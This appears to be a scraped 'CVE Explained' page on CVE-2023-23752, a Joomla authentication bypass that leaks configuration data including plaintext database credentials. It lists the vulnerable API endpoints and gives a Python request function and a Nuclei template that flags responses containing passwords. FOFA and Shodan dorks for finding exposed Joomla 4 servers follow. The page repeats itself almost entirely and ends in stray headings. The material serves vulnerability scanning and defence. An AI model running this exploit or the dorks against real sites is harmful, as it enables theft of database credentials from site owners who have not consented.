CVE Explained: CVE-2023-23752

Joomla critical information leak.

PreviousCVE Explained: CVE-2023–38646 NextCVE Explained: CVE-2023-46604

Last updated 1 year ago

CVE Explained: CVE-2023-23752

Joomla critical information leak.

references:
- Read: vulncheck and Pingsafe
- Exploit: Ruby and Python
- Video with Nuclei template: Here
Exploitation {POC}:
CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. Exploit was that whenever the user was visiting the joomla root-url where the server was running and appending this endpoint :
```
{root-url}/api/index.php/v1/config/application?public=true
```
and:
```
{root-url}/api/index.php/v1/users?public=true
```

Exploit Development

We send the request to these endpoints and get the response.

def send_request(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0'}
        response1 = requests.get(url+"api/index.php/v1/config/application?public=true")
        response1.raise_for_status()  # Raise an HTTPError for bad responses
        if response1.status_code == 404:
            response2 = requests.get(url + '/api/index.php/v1/users?public=true')
            response2.raise_for_status()
            return response2.text
        else:
            response1.raise_for_status()
            return response1.text
    except requests.RequestException as e:
        print(f"Error in sending request: {e}")
        return None

The whole exploit: Anekant

id: CVE-2023-23752

info:
  name: CVE-2023-23752-joomla
  author: badboycxcc
  severity: info
  description: description
  reference:
    - https://cve.report/CVE-2023-23752
  tags: CVE-2023-23752

requests:
  - raw:
      - |+
        GET /api/index.php/v1/config/application?public=true HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "password"
          
      - type: word
        part: body
        words:
          - "attributes"

      - type: status
        status:
          - 200

Template is acquired from this github commit by badboycc.

Dorks

FOFA

app="Joomla-4"

SHODAN

product="Joomla-4"

PreviousCVE Explained: CVE-2023–38646 NextCVE Explained: CVE-2023-46604

Last updated 1 year ago

references:
- Read: vulncheck and Pingsafe
- Exploit: Ruby and Python
- Video with Nuclei template: Here
Exploitation {POC}:
CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. Exploit was that whenever the user was visiting the joomla root-url where the server was running and appending this endpoint :
```
{root-url}/api/index.php/v1/config/application?public=true
```
and:
```
{root-url}/api/index.php/v1/users?public=true
```

Exploit Development

We send the request to these endpoints and get the response.

def send_request(url):
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0'}
        response1 = requests.get(url+"api/index.php/v1/config/application?public=true")
        response1.raise_for_status()  # Raise an HTTPError for bad responses
        if response1.status_code == 404:
            response2 = requests.get(url + '/api/index.php/v1/users?public=true')
            response2.raise_for_status()
            return response2.text
        else:
            response1.raise_for_status()
            return response1.text
    except requests.RequestException as e:
        print(f"Error in sending request: {e}")
        return None

The whole exploit: Anekant

id: CVE-2023-23752

info:
  name: CVE-2023-23752-joomla
  author: badboycxcc
  severity: info
  description: description
  reference:
    - https://cve.report/CVE-2023-23752
  tags: CVE-2023-23752

requests:
  - raw:
      - |+
        GET /api/index.php/v1/config/application?public=true HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
        Connection: close
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "password"
          
      - type: word
        part: body
        words:
          - "attributes"

      - type: status
        status:
          - 200

Template is acquired from this github commit by badboycc.

Dorks

FOFA

app="Joomla-4"

SHODAN

product="Joomla-4"

Exploitation {POC}:

Exploit Development

Dorks

Exploitation {POC}:

Exploit Development

Dorks